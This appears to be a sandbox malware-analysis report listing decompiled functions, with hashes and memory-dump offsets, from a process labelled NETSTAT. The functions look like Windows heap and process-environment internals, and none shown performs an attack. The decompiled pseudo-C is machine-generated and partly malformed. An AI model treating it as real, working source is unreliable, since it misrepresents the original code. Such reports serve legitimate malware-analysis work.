                • Opcode ID: 43ae284e6d6e30bba1262b4c2c950a36cc61cfccfe5e287318c3bcbc4f0940c3
                • Instruction ID: 310bac8b0fe9cfd222ecfa17d1825916044bfad9499c128da35d2ce6d7391d40
                • Opcode Fuzzy Hash: 43ae284e6d6e30bba1262b4c2c950a36cc61cfccfe5e287318c3bcbc4f0940c3
                • Instruction Fuzzy Hash: 5CF06D75E10748EFDB14EFA8D845AAEB7F4EF18300F04406AA915EF391EA349900CB98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0337C577(void* __ecx, char _a4) {
                				void* __esi;
                				void* __ebp;
                				void* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t18 = __ecx;
                				_t21 = __ecx;
                				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0337C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x33311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                					__eflags = _a4;
                					if(__eflags != 0) {
                						L10:
                						E034288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                						L9:
                						return 0;
                					}
                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                					if(__eflags == 0) {
                						goto L10;
                					}
                					goto L9;
                				} else {
                					return 1;
                				}
                			}









                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: 831fe211a3a807ea14f66c92d4bd0e79018693d168ce22d81b5e31fd6a4697b3
                • Instruction ID: d81cd5a7aefbd797bebc8c73c568abccf5ec1e0539785d893e9f3f69b599c269
                • Opcode Fuzzy Hash: 831fe211a3a807ea14f66c92d4bd0e79018693d168ce22d81b5e31fd6a4697b3
                • Instruction Fuzzy Hash: 6AF0B4B2915B919FD731DB16C8C4B21BFDC9B057F0F4CA4A7D40587501C6AEDC84CA50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E0339927A(void* __ecx) {
                				signed int _t11;
                				void* _t14;
                
                				_t11 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                				if(_t11 != 0) {
                					E0339FA60(_t11, 0, 0x98);
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					asm("movsd");
                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                					E033992C6(_t11, _t14);
                				}
                				return _t11;
                			}





                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                • Instruction ID: c45d431f8d42b9b7efd6971f8145fe4d8365175ee57400241ae68f47d675e5d4
                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                • Instruction Fuzzy Hash: 7CE09B32740640ABEB61EE56DCC4F57775DDF82721F04407DB5045E242C6E6DD0987A4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E03428D34(intOrPtr __ecx, intOrPtr __edx) {
                				signed int _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				short _v42;
                				char _v48;
                				signed char* _t12;
                				intOrPtr _t18;
                				intOrPtr _t24;
                				intOrPtr _t25;
                				signed int _t26;
                
                				_t23 = __edx;
                				_v8 =  *0x344d360 ^ _t26;
                				_v16 = __ecx;
                				_v42 = 0x1c2b;
                				_v12 = __edx;
                				if(E03377D50() == 0) {
                					_t12 = 0x7ffe0386;
                				} else {
                					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v48);
                				_push(8);
                				_push(0x20402);
                				_push( *_t12 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 56087b20d71cd50312639776407c774c150f3a2fd6a332fe9a4a44dcb48f640d
                • Instruction ID: 924782344b39e4b220d713722291cedcdc723457fe32d5f2d89475d9e6a5fe3c
                • Opcode Fuzzy Hash: 56087b20d71cd50312639776407c774c150f3a2fd6a332fe9a4a44dcb48f640d
                • Instruction Fuzzy Hash: E7F09074E047189FDB14EBB8D441A6EB7B4EB04600F50809AE905AF281EA34D9008754
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E03412073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                				void* __esi;
                				signed char _t3;
                				signed char _t7;
                				void* _t19;
                
                				_t17 = __ecx;
                				_t3 = E0340FD22(__ecx);
                				_t19 =  *0x344849c - _t3; // 0x0
                				if(_t19 == 0) {
                					__eflags = _t17 -  *0x3448748; // 0x0
                					if(__eflags <= 0) {
                						E03411C06();
                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                						__eflags = _t3;
                						if(_t3 != 0) {
                							L5:
                							__eflags =  *0x3448724 & 0x00000004;
                							if(( *0x3448724 & 0x00000004) == 0) {
                								asm("int3");
                								return _t3;
                							}
                						} else {
                							_t3 =  *0x7ffe02d4 & 0x00000003;
                							__eflags = _t3 - 3;
                							if(_t3 == 3) {
                								goto L5;
                							}
                						}
                					}
                					return _t3;
                				} else {
                					_t7 =  *0x3448724; // 0x0
                					return E03408DF1(__ebx, 0xc0000374, 0x3445890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                				}
                			}








                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598588262a689ad800d849ee2413f512da31aae22eb3cf9df2946fb28b54b681
                • Instruction ID: d222236bc716e4cb026e1489ca07349a9bb0e8842b5518da7519c346230b3897
                • Opcode Fuzzy Hash: 598588262a689ad800d849ee2413f512da31aae22eb3cf9df2946fb28b54b681
                • Instruction Fuzzy Hash: 51F0273E411A984ADE32EB2536112D27FC4CB45110B0D09E7D650AF305C67588A3CA1C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E03428B58(intOrPtr __ecx) {
                				signed int _v8;
                				intOrPtr _v20;
                				short _v46;
                				char _v52;
                				signed char* _t11;
                				intOrPtr _t17;
                				intOrPtr _t22;
                				intOrPtr _t23;
                				intOrPtr _t24;
                				signed int _t25;
                
                				_v8 =  *0x344d360 ^ _t25;
                				_v20 = __ecx;
                				_v46 = 0x1c26;
                				if(E03377D50() == 0) {
                					_t11 = 0x7ffe0386;
                				} else {
                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v52);
                				_push(4);
                				_push(0x402);
                				_push( *_t11 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 956aae2775f463cc86313b72796406c77f4101e9418584680f36c6f32fbcf868
                • Instruction ID: 4ec5c9d3af31cabd72a372c47675afc3578af05467b6f984a16b198890fa476d
                • Opcode Fuzzy Hash: 956aae2775f463cc86313b72796406c77f4101e9418584680f36c6f32fbcf868
                • Instruction Fuzzy Hash: E9F05EB4E04258ABDB10EBA8D946A7EB7A4EB04600F44045AB915AF381EA34D900C798
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E03354F2E(void* __ecx, char _a4) {
                				void* __esi;
                				void* __ebp;
                				void* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t18 = __ecx;
                				_t21 = __ecx;
                				if(__ecx == 0) {
                					L6:
                					__eflags = _a4;
                					if(__eflags != 0) {
                						L8:
                						E034288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                						L9:
                						return 0;
                					}
                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                					if(__eflags != 0) {
                						goto L9;
                					}
                					goto L8;
                				}
                				_t18 = __ecx + 0x30;
                				if(E0337C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3331030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                					goto L6;
                				} else {
                					return 1;
                				}
                			}










                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e21b37c2c0f166dc4dbbccfe8ab98fa9f06d28c4b07f488f062aaef07e6c8ea
                • Instruction ID: 41e5eb5eb67b65fe9c7d7a5a1bc1143275544a94bcff83cb863b26ca07a2a8ab
                • Opcode Fuzzy Hash: 1e21b37c2c0f166dc4dbbccfe8ab98fa9f06d28c4b07f488f062aaef07e6c8ea
                • Instruction Fuzzy Hash: 3AF0E2369217948FD774D719CAC0FA3B7F8AB007BCF4854A5D9458BD21D728EC80C640
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E0337746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                				signed int _t8;
                				void* _t10;
                				short* _t17;
                				void* _t19;
                				intOrPtr _t20;
                				void* _t21;
                
                				_t20 = __esi;
                				_t19 = __edi;
                				_t17 = __ebx;
                				if( *((char*)(_t21 - 0x25)) != 0) {
                					if(__ecx == 0) {
                						E0336EB70(__ecx, 0x34479a0);
                					} else {
                						asm("lock xadd [ecx], eax");
                						if((_t8 | 0xffffffff) == 0) {
                							_push( *((intOrPtr*)(__ecx + 4)));
                							E033995D0();
                							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                						}
                					}
                					L10:
                				}
                				_t10 = _t19 + _t19;
                				if(_t20 >= _t10) {
                					if(_t19 != 0) {
                						 *_t17 = 0;
                						return 0;
                					}
                				}
                				return _t10;
                				goto L10;
                			}










                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 154436c7372877c550a9bc924f6fd26ca1a03033ee296b6bbfee4187a11e72db
                • Instruction ID: abd09f80a8cff404eecea3214e118137a91a3e2581ee13c442fdedf35f086d07
                • Opcode Fuzzy Hash: 154436c7372877c550a9bc924f6fd26ca1a03033ee296b6bbfee4187a11e72db
                • Instruction Fuzzy Hash: FBF0B439904244EADF21D768CCC0BF9BB75AF04210F08015DD4E1AB550E72DD841C7C5
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 36%
                			E03428CD6(intOrPtr __ecx) {
                				signed int _v8;
                				intOrPtr _v12;
                				short _v38;
                				char _v44;
                				signed char* _t11;
                				intOrPtr _t17;
                				intOrPtr _t22;
                				intOrPtr _t23;
                				intOrPtr _t24;
                				signed int _t25;
                
                				_v8 =  *0x344d360 ^ _t25;
                				_v12 = __ecx;
                				_v38 = 0x1c2d;
                				if(E03377D50() == 0) {
                					_t11 = 0x7ffe0386;
                				} else {
                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                				}
                				_push( &_v44);
                				_push(0xffffffe4);
                				_push(0x402);
                				_push( *_t11 & 0x000000ff);
                				return E0339B640(E03399AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                			}














                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6749a23023b45b819bf8eedb202e18441fe4a5a4961e9172be1906d064e5ea1b
                • Instruction ID: 851dff5fac706d2e03c7d4d1de85b78c8f552ede6a75848a8af1a03263a07786
                • Opcode Fuzzy Hash: 6749a23023b45b819bf8eedb202e18441fe4a5a4961e9172be1906d064e5ea1b
                • Instruction Fuzzy Hash: C4F08275E04218AFDF04EBA8E985E6EB7B4EF09300F54019AE915EF381EA34E904C758
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0338A44B(signed int __ecx) {
                				intOrPtr _t13;
                				signed int _t15;
                				signed int* _t16;
                				signed int* _t17;
                
                				_t13 =  *0x3447b9c; // 0x0
                				_t15 = __ecx;
                				_t16 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                				if(_t16 == 0) {
                					return 0;
                				}
                				 *_t16 = _t15;
                				_t17 =  &(_t16[2]);
                				E0339FA60(_t17, 0, _t15 << 2);
                				return _t17;
                			}








                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 317d0171a348587ed20ea046ad4164c2aa8146b27de64e99267d1d25f4888b0c
                • Instruction ID: 02f1c3c51a3ce757d02a5dbc3907f1f8368b1e2cc8894bfb51093939d1c9a9fb
                • Opcode Fuzzy Hash: 317d0171a348587ed20ea046ad4164c2aa8146b27de64e99267d1d25f4888b0c
                • Instruction Fuzzy Hash: 3EE092B2A05521ABD722AB18AC40F66B39DDBD4A51F0D4036E504DB224D628DD42C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E0335F358(void* __ecx, signed int __edx) {
                				char _v8;
                				signed int _t9;
                				void* _t20;
                
                				_push(__ecx);
                				_t9 = 2;
                				_t20 = 0;
                				if(E0338F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                					_t20 = L03374620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                				}
                				return _t20;
                			}







                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                • Instruction ID: ec3c0e19e5942cd93a6e5700be7f80ac48f5e8a5f04ba6086448ed3464cf2030
                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                • Instruction Fuzzy Hash: 28E0DF32A42218FBDB31EAD99E45FAABBACDB58A60F040195BD04DB150D564AE00C2D0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0336FF60(intOrPtr _a4) {
                				void* __ecx;
                				void* __ebp;
                				void* _t13;
                				intOrPtr _t14;
                				void* _t15;
                				void* _t16;
                				void* _t17;
                
                				_t14 = _a4;
                				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x33311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                					return E034288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                				} else {
                					return E03370050(_t14);
                				}
                			}











                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa334e87b075bc61ffa3021ce3f7f1963ec13a150179e8c084c2c8b2cb04431e
                • Instruction ID: 6f9a25ef22ef67e097068248def08afb621a86a901ffb7c845ec77c711e6c70b
                • Opcode Fuzzy Hash: fa334e87b075bc61ffa3021ce3f7f1963ec13a150179e8c084c2c8b2cb04431e
                • Instruction Fuzzy Hash: 5BE0DFB4A053049FD734DB52E4C0F297B9CAB42621F1DC29EE4084F509CA25D880C20A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0340D380(void* __ecx, void* __edx, intOrPtr _a4) {
                				void* _t5;
                
                				if(_a4 != 0) {
                					_t5 = L0335E8B0(__ecx, _a4, 0xfff);
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                					return _t5;
                				}
                				return 0xc000000d;
                			}





                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                • Instruction ID: e1042c09be1f9b1d4604e4d38dddb3aae15ef9c715c62fc29f87d31d5a10aaea
                • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                • Instruction Fuzzy Hash: 8FE08C35680244ABDB229E94CC00FB9BA1A9B40BA1F104032BE085EA90C6759D92D6C8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E033E41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                				void* _t5;
                				void* _t14;
                
                				_push(8);
                				_push(0x34308f0);
                				_t5 = E033AD08C(__ebx, __edi, __esi);
                				if( *0x34487ec == 0) {
                					E0336EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                					if( *0x34487ec == 0) {
                						 *0x34487f0 = 0x34487ec;
                						 *0x34487ec = 0x34487ec;
                						 *0x34487e8 = 0x34487e4;
                						 *0x34487e4 = 0x34487e4;
                					}
                					 *(_t14 - 4) = 0xfffffffe;
                					_t5 = L033E4248();
                				}
                				return E033AD0D1(_t5);
                			}






                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f69ad318dfb646f1f55c64d678609d9d63b9ebec2b6e8fc393cc42b12196eb68
                • Instruction ID: f12bdd31809c6cfe5777fa556c3daa83cac330037483cc4e5986418d6a652523
                • Opcode Fuzzy Hash: f69ad318dfb646f1f55c64d678609d9d63b9ebec2b6e8fc393cc42b12196eb68
                • Instruction Fuzzy Hash: 64F0157C850724CEEBA0FFA9AE60728BAE4F748312F10417A8100AF688D73A4484DF05
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0338A185() {
                				void* __ecx;
                				intOrPtr* _t5;
                
                				if( *0x34467e4 >= 0xa) {
                					if(_t5 < 0x3446800 || _t5 >= 0x3446900) {
                						return L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                					} else {
                						goto L1;
                					}
                				} else {
                					L1:
                					return E03370010(0x34467e0, _t5);
                				}
                			}






                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c70b75a76e97cbb2560301ae3a3b37d9ada5953781a344492645980f58897615
                • Instruction ID: bd0b98134bace684a32aa9ae01d1bda72b585d92ed7c3efa48cd7563c7f28c88
                • Opcode Fuzzy Hash: c70b75a76e97cbb2560301ae3a3b37d9ada5953781a344492645980f58897615
                • Instruction Fuzzy Hash: A3D02E299712046AE72CF308CAD4B35B252E781B10F32082FF1034E9A0DBACC8D2810C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033816E0(void* __edx, void* __eflags) {
                				void* __ecx;
                				void* _t3;
                
                				_t3 = E03381710(0x34467e0);
                				if(_t3 == 0) {
                					_t6 =  *[fs:0x30];
                					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                						goto L1;
                					} else {
                						return L03374620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                					}
                				} else {
                					L1:
                					return _t3;
                				}
                			}






                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cee545f18cbf739cf36d1cc511dc384af1d4055372041fdc93df8ad3fe778e69
                • Instruction ID: b1ff69de489e453ec2dbc429758ee3b8ce06caa9c5662091e969c475306cf627
                • Opcode Fuzzy Hash: cee545f18cbf739cf36d1cc511dc384af1d4055372041fdc93df8ad3fe778e69
                • Instruction Fuzzy Hash: 52D05231A00300A2EA2DEB119C84B146252AB80B81F38006CF60A4D8C0CFA8D8A3E048
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033D53CA(void* __ebx) {
                				intOrPtr _t7;
                				void* _t13;
                				void* _t14;
                				intOrPtr _t15;
                				void* _t16;
                
                				_t13 = __ebx;
                				if( *((char*)(_t16 - 0x65)) != 0) {
                					E0336EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                				}
                				if(_t15 != 0) {
                					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                					return  *((intOrPtr*)(_t16 - 0x64));
                				}
                				return _t7;
                			}








                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                • Instruction ID: b5f7809d515e39468c0311c171be5c37e950d71d4e04a46cab9e8f89e29d7feb
                • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                • Instruction Fuzzy Hash: 69E08C369447809FCF12DB48CA90F5EB7F5FB45B00F180008A0085FA20C734AC01CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0336AAB0() {
                				intOrPtr* _t4;
                
                				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                				if(_t4 != 0) {
                					if( *_t4 == 0) {
                						goto L1;
                					} else {
                						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                					}
                				} else {
                					L1:
                					return 0x7ffe0030;
                				}
                			}




                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                • Instruction ID: 28cceff955f2b5c0a4fd78f97abd699bb8f54f0d2f23a1e24227fb77b9214958
                • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                • Instruction Fuzzy Hash: 5DD0E975352D80CFD616CB1DC994B5573B8BB45B44FC944E0E501CBB65E62CD984CA10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E033835A1(void* __eax, void* __ebx, void* __ecx) {
                				void* _t6;
                				void* _t10;
                				void* _t11;
                
                				_t10 = __ecx;
                				_t6 = __eax;
                				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                				}
                				if( *((char*)(_t11 - 0x1a)) != 0) {
                					return E0336EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                				}
                				return _t6;
                			}






                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
